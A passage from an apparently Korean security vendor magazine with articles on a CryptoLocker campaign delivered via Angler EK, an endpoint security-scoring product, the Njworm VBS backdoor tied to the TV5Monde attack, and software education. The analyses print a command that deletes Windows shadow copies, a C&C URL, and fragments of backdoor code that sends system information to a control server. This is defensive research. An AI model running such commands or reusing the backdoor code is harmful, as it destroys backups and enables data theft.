[그림 5] Angler EK 동작 구조
[표 1] 애플리케이션 제어 변수
[그림 4] C업체에 삽입된 악성 스크립트
[표 2] CVE-2014-6332 취약점
[표 3] CVE-2014-0515 취약점 발생 부분
자동화된 웹 공격 툴킷–“Angler EK”
크립토락커에 감염되면 사용자는 최종적으로 난독화된 ‘Angler EK’의
취약점 랜딩 페이지로 연결된다.
이때 악성코드의 탐지 우회 기능과 유사하게, 스크립트 레벨에서도 취
약점 ‘CVE-2013-7331’을 이용하여 가상 환경, 분석 환경, 백신 프로그
램 등의 클라이언트 환경을 체크한다. 만약, 해당 프로그램들이 존재하
는 경우, 공격이 정상적으로 이루어지지 않는다.
또한, [표 1]과 같이 특유의 변수를 이용하여 개별 애플리케이션들의
공격 여부를 제어한다.
애플리케이션 변수
어도비 플래시 플레이어WiNDoW.SF325gtgS7SFDF1WiNDoW.SF325gtgS7SFDF2
mS 실버라이트 WiNDoW.SF325gtgS7SFDS
오라클 자바 WiNDoW.SF325gtgS7SFDj
환경체크 WiNDoW.SF325gtgS7SFDFN
취약점 및 페이로드 (셸코드)
일반적인 Angler EK는 다양한 애플리케이션 취약점을 이용하는 것으
로 알려졌으나, 이번 공격에는 ‘갓 모드(God Mode)’로 알려진 ‘CVE-
2014-6332’와 어도비의 플래시 플레이어 취약점인 ‘CVE-2014-0515’
취약점이 이용되었다.
1919
기능 분석
전체 동작 흐름
이번 랜섬웨어가 실행되면 다른 악성코드처럼 자기 자신
을 ‘%WINDOWS%’ 폴더에 복사해놓고 ‘HKCU\Software\
Microsoft\Windows\CurrentVersion\Run\<랜덤명>’에 등록한
다. 해당 키에 실행 파일을 등록해 놓으면 시스템을 재 부팅할 때마다
자동으로 실행되는데, 이렇게 되면 해당 파일을 찾아서 삭제하지 않는
다면 감염된 PC의 사용자가 금액을 지급하고 파일을 복구했다 하더라
도 재감염될 가능성이 크다. 자신을 자동 실행되게 등록한 후에는 정상
‘explorer.exe’ 프로세스를 생성하고 C&C 서버 통신 및 파일을 암호화
하는 주요 기능을 포함한 PE 파일을 인젝션시켜서 동작한다.
네트워크 접속
네트워크 통신 상태를 확인하기 위해 ‘w w w .d o w n l o a d .
windowsupdate.comm’과 ‘akamaitechnologies.com’에 접속한
다. 이후 C&C 서버인 ‘https://lepodick.ru/topic.php’에 두 번에 걸
쳐 ‘POST’ 패킷을 전송하는데 첫 번째는 사용자 PC의 정보를 전달
한 후 IP 대역에 따른(나라별) ‘.txt’와 ‘.html’ 파일을 받아온다. 그리고
두 번째에는 앞에서 보낸 정보에 암호화된 파일들을 복호화할 때 필
요한 키 정보(256byte)를 함께 보내고 서버에서 ‘200 OK’ 응답을 받
으면 파일들을 암호화하기 시작한다. 서버로부터 받은 ‘DECRYPT_
INSTRUCTIONS.txt’와 ‘DECRYPT_INSTRUCTIONS.html’ 파일은 암
호화한 파일이 있는 모든 폴더에 생성되며, 시스템이 감염되었다는 메
시지를 사용자에게 보여주고 파일을 정상적으로 복원하기 위해 비트코
인을 사용한 결제 방법이 설명되어 있다.
[그림 6] 크립토락커 동작 흐름
[그림 7] C&C 통신 과정 [그림 8] 감염 전/후의 변경된 파일명
볼륨 섀도 카피 삭제
아래 명령을 실행해서 볼륨 섀도 카피를 삭제하는데 이렇게 되면 윈도
운영체제에서 제공하는 파일 백업 및 복원 기능을 정상적으로 사용할
수 없다. 이 명령은 크립토락커 류에서 공통적으로 확인할 수 있는 기
능이다.
- vssadmin.exe Delete Shadows /All /Quiet
파일 암호화
랜섬웨어의 가장 특징적인 기능은 사용자의 중요 파일들을 암호화하
는 것이다. 아래에 리스트되어 있는 확장자를 가진 파일과 폴더는 대상
에서 제외된다. 그리고 ‘이동식 드라이브’와 ‘네트워크 드라이브’에 있
는 파일도 암호화 대상이 되며 암호화가 완료된 파일에는 확장자 뒤에
‘.encrypted’ 문자열이 붙는다.
[제외 대상 확장자]
.avi, .wav, .mp3, .gif, .ico, .png, .bmp, .txt, .html, .inf, .manifest,
.chm, .ini, .tmp, .log, .url, .lnk, .cmd, .bat, .scr, .msi, .sys, .dll, .exe
[제외 대상 폴더]
- %Program Files%
- %ProgramW6432%
- C:\WINDOWS
- C:\Documents and Settings\All Users\Application Data
- C:\Documents and Settings\사용자계정\Application Data
- C:\Documents and Settings\사용자계정\Local Settings\
Application Data
- C:\Documents and Settings\사용자계정\Cookies
- C:\Documents and Settings\사용자계정\Local Settings\
History
- C:\Documents and Settings\사용자계정\Local Settings\
Temporary Internet Files
앞에서 리스트되어 있던 암호화 대상 제외 확장자 및 폴더를 제외하고
는 파일 외형적으로는 [그림 8]처럼 파일의 확장자에 ‘.encrypted’가
추가된 것을 확인할 수 있다. 이렇게 암호화된 파일 내부에는 변경된
원본 데이터와 시그니처 그리고 복호화에 필요한 256바이트 공개키가
포함되어 있다.
2020
복구 프로그램
이번에 한글로 유포된 크립토락커에 대한 복구 프로그램은 내부에 감
염 사용자별로 다른 복호화 키 인덱스 정보(0x20바이트)를 포함하고
있다. 실행 시, [그림 9]와 같은 화면이 나타나며 “Start Decryption”
버튼을 클릭하면, 감염 조건에 부합하는 드라이브 및 폴더에 대한 스캔
과정을 수행하며 “.encrypted” 확장자를 갖는 파일들에 대해 실제 복
호화 작업이 이루어짐을 확인할 수 있다.
이때 “.encrypted”로 암호화된 파일은 공통적으로 원래 파일 크기
에 0x108(264바이트)가 증가한 것을 알 수 있다. 파일 끝에 추가된
0x108 크기의 데이터는 다음과 같은 구조를 갖는다.
증가한 264 바이트 = 해시정보(4–bytes) + 시그니처(4–bytes) + 공
개키(256–bytes)
최근 이슈가 된 크립토락커는 국내 유명 커뮤니티 웹사이트의 광고 배
너를 통해 유포되면서 큰 피해를 입혔다. 이에 웹 관리자의 보안에 대
한 주의가 필요하며 PC 사용자는 랜섬웨어 악성코드를 예방하기 위
해 발신자가 불명확한 이메일의 열람에 주의하고 중요 파일들은 별
도로 백업해 두는 것이 좋다. 그리고 취약점에 의한 감염 피해를 줄
이기 위해 운영체제와 응용프로그램들을 항상 최신으로 업데이트해
야 한다. 이 외에도 백신프로그램을 통해 예방할 수 있는데 V3에서는
해당 악성코드를 ‘Win-Trojan/Cryptolocker.229892’, ‘Win-Trojan/
Cryptolocker.Gen’, ‘Trojan/Win32.Cryptolocker’ 등으로 진단하고
있으며 안랩은 현재까지 파악된 관련 악성 경유지 및 유포지를 확보했
다. 이를 통해 추가 피해가 발생하지 않도록 지속적으로 모니터링을 강
화하고 있다.
[그림 9] 복구 프로그램 내부에 저장된 키정보
[그림 10] 유효한 키 여부 검증하는 부분
[그림 10]은 실제 복구툴 내부에 저장된 키 인덱스 정보(0x20바이트)를
통해 생성된 데이터(0x108바이트)와 “.encrypted” 파일에 존재하는 해
시 정보를 비교해 유효한 키인지 검증하는 과정을 나타낸다.
21
ahnlab 내pC지키미p R O d u C T i S S u E
최근 보안의 초점이 다시 엔드포인트로 향하고 있다. 날로 증가하는 보안 위협에 대응하기 위해 다양한 보안 솔루션을 도입하는 것도
중요하지만 결국 엔드포인트의 보안 관리가 근본이자 핵심이라는 것이 전문가들의 공통된 목소리다. 특히 기존의 형식적인 점검이
아니라 실질적인 관리의 형태로 변화하고 있다. 이와 관련해 최근 ‘보안지수화 사업’이 화두가 되고 있다. 이 글에서는 보안지수화의
의미와 함께 효율적인 보안지수화 수행 방안에 대해 알아본다.
‘AhnLab 내PC 지키미’ 기반의 통합적인 보안지수화 모델
핫(hot)한 ‘보안지수화’ 사업 모델을 찾는다면?
최근 보안 담당자들은 정해진 일정에 따른 단순 점검이 아니라 엔드포인트의 보안 상태를 어떻게 지속적으로 모니터링하고 관리할 것인지에 대
해 고민하고 있다. 물론 가장 이상적인 방법은 사용자, 즉 조직 구성원들이 스스로 관심을 갖고 PC의 보안 상태를 점검하고 조치하는 것이겠지
만, 바쁜 업무 속에서 꾸준히 보안에 관심을 갖고 관리하기를 기대하는 것은 현실적으로 무리가 있다.
상황이 이렇다 보니 기업들은 각 PC의 보안 관리 현황을 ‘핵심성과지표(Key Performance Indicators, KPI)’에 반영하는 방안을 검토하고 있으며,
이와 관련해 ‘보안지수화’ 사업이 조명 받고 있다.
‘보안지수화’, 능동적인 사용자 보안 관리 유도할 것
‘보안지수화’란 말 그대로 보안 현황을 수치화하여 관리하는 것이다. 대부분의 기업은 이미 엔드포인트부터 네트워크에 이르기까지 다수의 보안
솔루션을 도입 및 운영하고 있다. 각각의 PC에 설치되어 있는 보안 솔루션만 해도 그 수와 종류가 상당하다. 따라서 조직 구성원들, 즉 사용자가
PC의 보안 상태를 쉽게 확인하고 조치할 수 있도록 하는 것이 보안지수화 사업의 핵심이다. 단순히 백신의 최신 엔진 업데이트 여부나 개인정보
파일에 대한 암호화 관리 등에 대해 일일이 점검하는 방식이 아니라 위협이 될 수 있는 요소들에 대한 보안 현황을 한 곳에 집중시켜 이를 점수
화함으로써 사용자 스스로가 PC의 보안 상태를 관리할 수 있도록 유도하는 것이다.
보안지수화는 보안 솔루션의 설치 및 점검 여부에 대한 확인뿐만 아니라 실질적인 엔드포인트의 보안 위협 요소를 다음과 같은 항목으로 분류한다.
1. 백신의 악성코드 탐지 여부
2. 개인정보 보유 현황 및 유출 탐지 여부
3. 설치된 프로그램의 최신 패치 적용 여부
4. PC 취약점 점검 현황 및 보안 평가 점수
위와 같은 기준으로 다양한 엔드포인트 보안 솔루션에서 추출된 정보는 [그림 1]과 같이 ‘보안점검 수집서버’에서 취합된다. 수집된 정보는 보안
관리자가 설정한 가중치와 함께 종합적으로 판단해 수치화, 즉 점수로 환산하여 각 PC 사용자에게 제공된다. 이를 통해 사용자들은 자신의 PC
가 얼마나 안전하게 유지되고 있는지를 수시로 확인하고 어떤 항목을 보완해야 할지 파악함으로써 PC 보안 상태를 스스로 관리할 수 있다. 또한
이러한 각 PC의 정보는 월 단위로 취합, 정리되어 핵심성과지표(KPI)에 반영된다. 이를 통해 기존의 수동적인 보안 관리 방식에서 벗어나 사용자
스스로 관심을 갖고 능동적인 보안 관리를 이끌어낼 것으로 기대된다.
22
‘안랩 내PC지키미’, 보안지수화 모델 제시
보안지수화 사업과 함께 ‘안랩 내PC지키미’에 관심이 집중되고 있다. 특히 최근 금융감독원 고시에 따라 금융권에서도 지난 4월 16일부터 ‘정보
보안 점검의 날’이 시행됨에 따라 안랩 내PC지키미에 대한 문의가 이어지고 있다.
PC 취약점 점검 솔루션인 ‘안랩 내PC지키미’는 최신 보안 위협 요소를 중심으로 42개 항목에 대해 PC의 보안 상태를 자동으로 점검하고 점수
화한다. 홈(Home) 화면을 통해 보안 점수와 점수 추이 그래프를 제공해 사용자의 관심을 유도한다. 또한 ‘자동 조치’ 기능을 통해 취약한 항목에
대해 쉽고 간편하게 개선할 수 있어 사용자의 편의성을 극대화한다.
보안 관리자는 ‘강제 조치’ 기능을 통해 효율적으로 보안 정책 적용이 가능해 관리 부담은 최소화하고 기업의 전반적인 보안 수준 향상을 꾀할
수 있다. 특히 백신 강제 업데이트뿐만 아니라 패치 관리 솔루션, 개인정보보호 솔루션의 연동 및 통합 관리 등의 기능을 통해 타제품과는 차별
적인 엔드포인트 통합 관리를 구현한다.
안랩 내PC지키미와 패치관리 솔루션을 연동하여 사용할 경우 윈도 보안 패치뿐만 아니라 마이크로소프트 오피스 제품군, 인터넷 익스플로러
(Internet Explorer), 아래아한글, 어도비(Adobe), 자바(JAVA) SE RE 패치 등을 항상 ‘안전’ 상태로 유지할 수 있다. 또한 업무용 PC에 설치된 불
법 소프트웨어도 손쉽게 확인할 수 있다.
아울러 개인정보보호 솔루션과 연동할 경우, 관리자가 설정한 개인정보 파일의 조치 조건에 따라 안랩 내PC지키미는 각 PC의 개인정보 파일 조
치 현황을 안전, 취약 등으로 표시하여 사용자의 즉각적인 개인정보 관리를 유도할 수 있다는 것도 특징이다.
한편 안랩은 금융권 고객의 ‘증적 자료 제출’에 대한 부담을 덜어주기 위해 안랩 내PC지키미의 리포트 기능에 ‘업로드’ 기능을 연내 추가할 예정
이다.
[그림 1] 보안지수화 솔루션 구조
[그림 2] 안랩 내PC지키미
23
해외 타깃 공격에 이용된 악성코드 상세 분석
T h R E aT a N a ly S i S
프랑스 국영 TV 해킹 악성코드,
실체를 밝힌다
Cyber attack
사이버 공격의 대상이 다양한 산업군에서 국가 기관으로 확대되고 있다. 특히 최근 정치·사회적으로 국가 간 이해관계가 첨예하게 대
립함에 따라 사이버 공격이 더욱 격화되는 양상을 보이고 있다. 실제로 2015년 4월 8일 프랑스 공영 방송인 떼베생몽드(TV5Monde)
는 사이버 공격으로 인해 산하 11개 채널의 방송 불가 상태를 겪어야 했다. 떼베생몽드에 따르면 이 공격은 이슬람국가(IS) 혹은 추종
자에 의해 발생했다. 이 글에서는 떼베생몽드 사이버 공격에 이용된 악성코드에 대해 소개한다.
[그림 1] 떼베생몽드(TV5Monde) 해킹 기사
떼베생몽드 침해사고 발생
떼베생몽드(TV5Monde)는 1984년 1월 2일 개국한 프랑스어로 방송
되는 글로벌 텔레비전 방송국이다. 2015년 4월 8일 밤 프랑스 떼베
생몽드 방송국의 페이스북 계정이 해킹 당해 이슬람국가와 관련된 글
이 올려졌다. 그리고, 방송시스템과 홈페이지, 페이스북 계정이 모두
마비되었다.
Central Command)의 트위터 계정을 해킹해 선전 글을 남긴 바 있다.
떼베생몽드 침해 사고의 원인과 경로에 대해서 자세히 밝혀지지 않았
지만, 사고 다음날인 4월 9일 TV 화면을 통해 떼베생몽드의 부실한
보안 관리 체계가 드러났다.
[그림 2]에서 볼 수 있듯이 9일 방송된 TV 프로그램 중 인터뷰 영상
에서 암호로 보이는 문자열을 쓴 스티커가 화면에 비춰졌다. 이 스티
커에 적힌 것은 유튜브 계정 암호로 알려졌다. 실제로 9일 화면에 비
춰진 유튜브 암호는 ‘lemotdepassedeyoutube’로, 프랑스어로 유튜
브 암호라는 뜻이다.
[그림 2] 떼베생몽드의 트위터 암호가 노출된 방송 화면에 대한 트위터
이 공격의 배후로는 이슬람국가(Islamic State, IS) 혹은 추종자인 것
으로 알려졌다. 이슬람국가는 2015년 1월에도 미국 중앙 사령부(U.S.
24
[그림 3] 암호 노출에 대한 트위터
[그림 4] 블루코트 블로그
[그림 5] 아랍어로 제작된 악성코드 활용 동영상
(https://www.youtube.com/watch?v=sKtoONku1w0)
떼베생몽드가 암호를 적은 스티커를 벽이나 PC에 붙여두었을 만큼
암호 관리가 허술했으며, 이러한 부실한 보안 관리 체계가 침해 사고
와 무관하지 않다는 것을 짐작할 수 있다.
떼베생몽드 공격에 이용된 악성코드
2015년 4월 9일 글로벌 보안업체 블루코트(Blue Coat)에서 떼베생몽
드 침입과 관련된 악성코드 정보를 공개했다.
떼베생몽드에서 발견된 악성코드는 아랍어권에서 피해가 많은
Njworm 악성코드의 변형으로 밝혀졌다.
아랍어권 유행 악성코드 Njrat, Njworm
쿠웨이트인 Njq8이 제작한 Njrat와 Njworm은 다소 생소하지만 아
랍어권에서는 인기가 높은 악성코드이다. 인터넷을 통해 아랍어로 된
사용법 동영상도 쉽게 볼 수 있다. 이런 언어적 이점으로 해당 지역에
서 인기 있는 백도어가 되었다.
또한 2013년 5월에는 소스코드가 공개되어 이를 기반으로 한 변형이
발견되었다. 이 중 변형 생성기가 2014년 12월 8일 아랍어 개발자
사이트에 업로드되기도 하였다.
이 악성코드로 인한 피해가 증가함에 따라 2014년 6월 MMPC
(Microsoft Malware Protection Center)는 악성코드의 실체를 공개
하고 더 이상 악의적인 활동을 할 수 없도록 조치에 나섰다.
이때 악성코드 제작자도 확인되었는데 쿠웨이트인 나서 알 무타이
리(Naser Al Mutairi)와 알제리인 무하메드 베나브델라(Mohamed
Benabdellah)로 밝혀졌다.
제작자는 다양한 악성코드 생성기를 만들어서 배포하고 있다. 비주얼
베이직 악성코드 생성기도 있다. 생성기마다 만들어진 VBS 코드 형
태는 조금씩 다르지만, 사용자 정보 탈취 및 백도어 기능을 수행하는
점은 동일하다. 이 악성코드 생성기를 실행하면 통신용 포트(port) 번
호를 입력한다. 호스트(host) 주소, 포트(port), 이름(name), 디렉터
리(directory) 설정, 인스톨 이름(Install name) 등을 사용자가 설정
할 수 있다. 단, 생성된 파일은 조금씩 달라질 수 있다.
악성코드 생성기 살펴보기
지금부터 공개된 소스코드를 바탕으로 일부 수정된 몇 가지 악성코드
생성기가 어떻게 악성코드를 생성하는지 그 과정을 살펴보자.
1) 악성코드 생성기 1
우선 악성코드 생성기를 실행시키면 [그림 6]과 같이 포트(Port) 설정
창이 뜬다.
위 과정이 완료되면 [그림 7]과 같이 로그 창에 포트에 연결되었다는
메시지를 보여준다.
선택 후 빌더(Builder)를 클릭하면 아이피(IP)와 포트(Port) 등을 초
기화할 수 있는 창이 뜬다. 호스트, 포트, 이름, 인스톨 이름은 사용자
마음대로 설정할 수 있고, 디렉터리는 6개 중에서 선택할 수 있다.
흰 창에서 오른쪽 마우스를 누르면 명령을 전송할 수 있는 창이 뜬
다. 명령 종류는 웜(w0rm), 컴퓨터(Computer), 실행(Run), 선택
(Options)으로 나누어져 있고, 종류에 따라 여러 명령을 줄 수 있다.
[그림 6] 생성기 포트 설정
[그림 9] 빌더를 통한 악성코드 생성
[그림 8] 명령창
[그림 7] 포트 접속
25
[그림 10] 악성코드 생성기 2의 기본 화면
[그림 12] 명령창
[그림 15] 동작 순서
[그림 14] 두 악성코드의 차이점_가상 환경 검사 코드
[그림 13] 생성기 2의 설정 화면
[그림11] 설정 화면
[그림 16] 초기화 코드
[그림 17] 원격제어 명령 수행 코드
명령 종류는 간소해졌다. 파일 실행(Run File), VBS 코드(VBS code),
언인스톨 웜(Uninstall worm) 등 세 명령만 존재한다.
역시 호스트, 포트, 이름, 인스톨 이름은 사용자가 마음대로 설정할
수 있다. 그리고, 전파 파일 이름(Spread File Name)과 디렉터리 부
분은 수정되었다.
앞서 설명한 두 생성기의 가장 큰 차이점은 실행 환경이 가상 환경인
지를 확인하는 코드의 유무이다. 생성기 1은 가상 환경 확인 코드가
존재하지 않지만, 생성기 2는 코드 시작 부분에 vmcheck() 함수가
존재하여, 만약 가상 환경이라면 실행한 VBS 파일을 삭제하고 바로
종료된다.
백도어 부분은 C&C에서 보내는 명령에 대한 행위 동작이 정의되어 있다.
2) 악성코드 생성기 2
이번에는 또 다른 악성코드 생성기를 살펴보자. 이 생성기를 실행하
면 [그림 10]과 같이 포트 번호를 입력 하고, [그림 11]과 같이 간단하
게 설정할 수 있는 화면이 나타난다.
VB 스크립트 백도어
떼베생몽드에서 발견된 악성코드는 이런 생성기 중 하나로 제작된 비
주얼베이직스크립트(VBS) 악성코드로 사용자 정보 탈취 및 원격 제
어가 가능하다.
이 악성코드는 [그림 15]와 같은 동작을 수행한다.
1) 파일 생성
–C:\Documents and Settings\Administrator\시작 메뉴
\프로그램\시작프로그램\SecurityNajaf.vbs
–C:\Documents and Settings\Administrator\Local
Settings\Temp\(원본).vbs
2) 레지스트리 자동 실행 등록
–HKCU\Software\Microsoft\Windows\CurrentVersion\
Run\SecurityNajaf "wscript.exe //B "SecurityNajaf.vbs""
–HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Run\SecurityNajaff "wscript.exe //B "SecurityNajaf.vbs""
3) C&C 통신
스크립트 코드는 크게 초기화 부분과 백도어 부분으로 나눌 수 있다.
초기화 부분은 인스톨 이름, IP, 포트 설정 등과 같은 기본적인 것을
설정할 수 있다.
dim installnameinstallname = "SecurityNajaf.vbs"dim dirdir = "temp" path = shell.ExpandEnvironmentStrings("%" & dir & "%") & "\"dim splspl="|SE-NAjAF|"dim httpset http = Createobject("miCroSoFt.XmLhttP")dim host host = "127.0.0.1"dim portport = "1144" dim name name = "SECUrity 2014"
cmd = Send ("rEADy","")response = split(cmd,spl) select case response(0) Case "uninstall" uninstall case "rE" shell.run WScript.SCriPtFULLNAmE ,7 WScript.Quit case "download" download response(1),path & response(2)
26
자세한 명령어와 기능은 [표 1]과 같다. 하지만, 발견된 악성코드는 접속 주소가 자기 자신이어서 테스트 목
적으로 제작되었을 가능성이 높다.
지금까지 프랑스 떼베생몽드의 방송 중단이라는 초유의 사태를 일으
킨 악성코드에 대해 살펴보았다. 일반적으로 정치적 목적을 위한 사
이버 공격에서 방송국은 훌륭한 목표가 될 수 있다. 프랑스 떼베생몽
드 뿐 아니라 우리나라도 2013년 3월 20일 방송국 컴퓨터가 공격 당
한 일이 발생했다. 국내는 방송 송출까지 문제가 발생하지 않았지만
프랑스 떼베생몽드에서는 방송 송출까지 장애가 발생했다. 이런 사이
버 공격을 통해 방송 내용 가로채기, 방송 송출 장애와 같은 공격이
발생할 가능성이 높다. 따라서, 방송사의 보안 강화가 절실히 요구된
다. 또한 정치적 이유로 특정 국가, 지역에서 유행하는 악성코드가 공
격에 동원될 수 있어 이들 국가에서 널리 이용되는 악성코드에 대한
파악도 필요하다.
이 악성코드에는 백도어 이외에 사용자 정보를 탈취하는 기능이 존재
한다. 사용자 정보에는 사용자 이름, 컴퓨터 이름, 볼륨 시리얼 넘버,
윈도 버전 정보 등이 있다.
명령어 기능
uninstall 스크립트 Uninstall
rE 스크립트 재실행(reload)
download 파일 다운로드
update 스크립트 업데이트 및 재실행(reload)
execute 파일실행
cmd 셸 명령 수행
Attack 타깃에 Ping 무한 반복
ourl UrL 열기
close 스크립트 종료
shutdown 컴퓨터 종료
restart 컴퓨터 재시작
logoff 로그오프
[표 1] 명령어 종류
[그림 18] 시스템 정보 수집 코드
function Send(cmd,data)Send = ""http.open "PoSt","http://" & host & ":" & port &"/" & cmd, falsehttp.setrequestheader "User-Agent:", userinfohttp.send dataSend = http.responsetextend functionfunction userinfoon error resume nextif userinfo = "" thenx = "XDZX"userinfo = x & " startinfo" & spl & name & hwid & spl & oS & spl & computer & spl & username &spl &security & spl & usb & spl & "1.2" &spl & x end ifend Functionfunction computercomputer = shell.expandenvironmentstrings("%computername%")end functionfunction usernameusername = shell.expandenvironmentstrings("%username%")end function
[참고 문헌]
[1] French TV station TV5Monde hit by Islamic State hack (http://
www.dailymail.co.uk/wires/afp/article-3031644/French-TV5Monde-hit-
pro-Islamic-State-hackers.html)
[2] Simple njRAT Fuels Nascent Middle East Cybercrime Scene (http://
www.symantec.com/connect/blogs/simple-njrat-fuels-nascent-middle-
east-cybercrime-scene)
[3] New RATs Emerge from Leaked Njw0rm Source Code (http://blog.
trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-
leaked-njw0rm-source-code)
[4] https://www.eff.org/files/2013/12/28/quantum_of_surveillance4d.
[5] http://www.lemonde.fr/pixels/article/2015/04/09/les-sites-de-tv5-
monde-detournes-par-un-groupe-islamiste_4612099_4408996.html
[6] www.cnbc.com/id/102330338
[7] https://twitter.com/pent0thal
[8] https://www.bluecoat.com/security-blog/2015--04-09/visual-basic-
script-malware-reportedly-used-tv5-monde-intrusion
[9] https://www.youtube.com/watch?v=sKtoONku1w0
[10] https://jomgegar.com/topic/14665-njrat-v07dbuilderstub-full-
source-code/
[11] http://blogs.technet.com/b/mmpc/archive/2014/06/30/microsoft-
digital-crimes-unit-disrupts-jenxcus-and-bladabindi-malware-families.
aspx
[12] http://blogs.microsoft.com/blog/2014/06/30/microsoft-takes-on-
global-cybercrime-epidemic-in-tenth-malware-disruption/
27
소프트웨어 교육은 필요한가?
소프트웨어와 창의력
E x p E R T C O l u m N Software & Creativity
2014년부터 IT 업계와 교육계가 주목하는 화두 중 하나는 ‘소프트웨어 교육’이다. 모바일의 급격한 확산과 애플리케이션에 대한 관심
이 증가하였으며, 정부의 ‘소프트웨어 중심 사회’ 정책의 발표로 코딩에 대한 열기가 그 어느 때보다 뜨거워졌다. 소프트웨어를 만드는
프로그래밍 교육을 통하여 논리력과 사고력을 키우고, 창의적인 인재를 양성한다는 이야기가 여기저기서 쏟아지고 있는데 과연 소프
트웨어 교육이 논리, 사고, 창의에 관한 능력을 키우는데 도움이 되는 것일까?
월간 ‘안’에서는 이 질문에 대한 답을 찾기 위해서 과거와 현재, 소프트웨어와 창의력, 그리고 소프트웨어의 미래에 대해 두 번으로 나
누어서 정리하였다.
<연재 목차>
1부_지금은 소프트웨어의 시대 (2015년 4월호)
2부_소프트웨어와 창의력 (이번 호)
피타고라스의 정리
2014년 8월 세계수학자대회가 서울에서 열렸는데, 이 대회의 주관
방송사였던 EBS는 관련된 시리즈로 5부작 다큐멘터리 <다큐프라임–
문명과 수학>을 방송하였다. 이 프로그램의 2부 에서는 이집트 피라
미드의 높이와 변의 길이를 구하는 고민에서 출발하여 피타고라스의
정리에 대해서 다루었다.
우리나라의 중학교 교과과정에서 배우는 피타고라스의 정리는 c2 =
a2 + b2이라는 공식으로 표현되고 있는데, 직각삼각형의 두 밑변의 길
이를 알면 그로부터 나머지 한 변의 길이를 계산할 수 있음을 의미한다.
하지만 교과과정에서 증명하는 방법은 대부분 한 가지만 배우고 만다.
[그림 1] 피타고라스의 정리
실제로 이 정리를 증명하는 방법은 동서양을 막론하고 매우 다양하여
중국의 고대 수학서인 《주비산경》에는 ‘구고현의 정리’라고 불리는
아주 오래된 것부터 피타고라스의 정리와 함께 약 400여 가지가 알
려졌다고 한다.
하나의 증명 방법만 알고 있는 대부분의 사람들에게 400이라는 숫자
는 비현실적으로 들리지만, 가만히 생각해 보면 우리는 한 가지 방법
으로만 생각하고 있다는 뜻이다. 하나의 현상을 설명할 수 있는 방법
은 다양한데, 평생 오직 한 가지 방법만 알고 지낸다면 다른 방법에서
보여주는 수 많은 논리와 지식의 폭을 경험할 수 없다고 생각하니 매
우 안타까운 일이다.
산업화와 정보화
왜 다양한 방법 중에서 하나의 방법만을 배우게 된 것일까? 설명할
수 있는 수많은 논리가 있겠지만, 살아온 시대적 배경이 우리를 그렇
게 이끌었다는 점을 설명해 보려고 한다.
산업혁명 이후에 우리는 대량 생산(Mass Production)의 시대를 살아
왔다. 인구가 기하급수적인 그래프를 그리면서 폭발적으로 증가함에
따라 수요를 충족시키기 위한 생산성의 증대가 매우 중요해졌다. 이
시대는 몇 가지 종류의 상품을 대규모로 생산하고 유통하여 같은 것
을 소비했다. 이를 위하여 산업 시설을 확장하고 공급량을 늘려서 수
요를 뒷받침할 수 있도록 프로세스와 속도가 매우 중요한 시스템으로
자리잡았다. 즉, 최적화되고 정형화된 프로세스와 이를 활용한 생산성
향상이 중요한 관리 목표가 되었고, 커뮤니케이션, 연산, 도식화, 논리
적 설계, 우수한 기술의 활용 등이 산업화의 중심이 되면서 국어, 영
어, 수학, 과학과 같은 과목이 중시되었다. 또, 이를 실현할 수 있는 대
규모 하드웨어 설비, 사회기반 시설, 생산 시설과 운송 역량 등이 확산
되었다.
그러나 2000년대 이후에는 속도와 생산성을 추구하던 산업화 시대의
가치는 더 이상 유효하지 않다. 이제 인구가 정체되거나 감소하는 시
대가 되었고 더불어 줄어드는 수요와 함께 새로운 방향에 대해 고민
해야 하는 시점이 된 것이다.
28
소수의 상품을 대량으로 생산하던 시대를 지나서 수요가 정체되면 그
동안 소홀히 여기고 있었던 비교적 작지만 나름의 시장을 가지고 있
는 작은 수요들을 돌아보게 된다. 이러한 작은 수요들은(대량으로 생
산되던 시장과 비교하여) 다양한 모습을 가지고 있다. 예를 들어 컴퓨
팅 파워가 중요한 시대에는 얼마나 빠른 CPU와 메모리를 가지고 있
는가가 중요한 가치로 작용했다면, 이제는 메모리가 큰 컴퓨팅 파워가
필요한 경우, 그래픽 처리를 더 많이 필요로 하는 경우, 네트워크 속도
가 중요한 경우 등 서로 다른 부분이 중요하게 여겨지는 수요들로 나
뉘게 되었다.
이러한 시대적 흐름에서는 다양한 것에 대한 정보의 획득이 중요하다.
즉, 산업화 시대에는 같은 정보 혹은 더 많은 정보를 가지는 것이 유
리한 반면, 다양성을 중요시하는 현재는 해당 분야에서 필요한 더 좋
은 정보를 확보하는 것이 중요해졌다.
다양성의 구체화, 소프트웨어 교육
2014년 포브스가 조사한 세계 브랜드 순위에서 1위는 애플, 2위 마이
크로소프트, 3위 코카콜라, 4위 IBM, 5위가 구글로 조사되었다. 코카
콜라를 제외하고는 모두 IT 기업이라는 점이 현재를 이끌고 있는 파워
가 어디에 있는지를 미루어 짐작할 수 있을 것 같다.
소프트웨어 교육에 대해서 국가별로 관심과 실천 방안들이 나오고 있
다. 영국의 경우 2014년을 ‘코드의 해(Year of Code)로 지정하여 코
딩 교육의 중요성을 알리고 격려하는 캠페인을 진행했으며, 우리나라
의 국어·영어·수학 과목처럼 코딩 교육을 필수로 지정하였다. 미국
은 버락 오바마 대통령이 Code.org의 캠페인에 참여해 학생들과 함
께 코딩을 배우기도 했고, 우리나라도 2014년 7월에 ‘소프트웨어 중
심사회’에 관한 정부 주도의 비전을 제시하면서 코딩을 수능에 반영하
는 논의가 시작되었다.
애플의 창립자인 스티브 잡스는 “사람들이 프로그래밍을 배워야 하는
이유는 사고하는 법을 배워야 하기 때문이다”라고 하였으며, 미국의
대통령인 버락 오바마도 “코딩을 배우는 것이 개인의 미래를 위해서
라기 보다는 자국의 미래를 위해 중요하다”고 말할 만큼 소프트웨어
교육과 사고는 매우 중요하게 이야기되고 있다.
창의적 사고와 경험의 축적
흔히 IQ로 이야기하는 지능 지수는 창의력 지수가 아니다. IQ는 몇 가
지 척도(scale)로 구성되어 있는데, 일반적으로 언어력, 수리력, 기억
력, 논리력, 공간지각능력 등이다. 언어력은 말이나 글로써 표현하는
능력을 뜻하며, 수리력은 수학적인 계산이나 숫자에 대한 능력, 기억
력은 단기나 장기 기억 속에 얼마나 잘 저장하고 인출할 수 있는가에
대한 능력이다. 논리력은 논리적으로 생각하고 표현할 수 있는 능력을
말한다. 공간지각능력은 공간에 대한 이미지와 인식 능력인데 주차를
